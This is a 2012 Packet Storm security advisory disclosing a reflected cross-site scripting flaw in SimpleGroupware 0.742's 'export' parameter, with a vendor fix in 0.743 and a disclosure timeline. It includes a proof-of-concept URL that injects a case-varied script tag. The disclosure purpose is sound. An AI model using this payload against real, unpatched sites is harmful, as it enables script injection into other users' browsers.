SimpleGroupware 0.742 Cross Site Scripting

2012-02-07T00:00:00
ID PACKETSTORM:109516
Type packetstorm
Reporter Stefan Schurtz
Modified 2012-02-07T00:00:00

Description

                                        
                                            `Advisory: SimpleGroupware 0.742 Cross-Site-Scripting vulnerability  
Advisory ID: INFOSERVE-ADV2012-01  
Author: Stefan Schurtz  
Contact: security@infoserve.de  
Affected Software: Successfully tested on SimpleGroupware 0.742  
Vendor URL: http://www.simple-groupware.de/  
Vendor Status: fixed (see Changelog)  
  
==========================  
Vulnerability Description  
==========================  
  
SimpleGroupware 0.742 'export' parameter XSS vulnerability  
  
==================  
PoC-Exploit  
==================  
  
http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert('xss')</ScRiPt>  
  
=========  
Solution  
=========  
  
Upgrade to the latest Version 0.743  
  
====================  
Disclosure Timeline  
====================  
  
01-Feb-2012 - informed vendor  
02-Feb-2012 - fixed by vendor  
  
========  
Credits  
========  
  
Vulnerabilitiy found and advisory written by the INFOSERVE security team.  
  
===========  
References  
===========  
  
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt  
`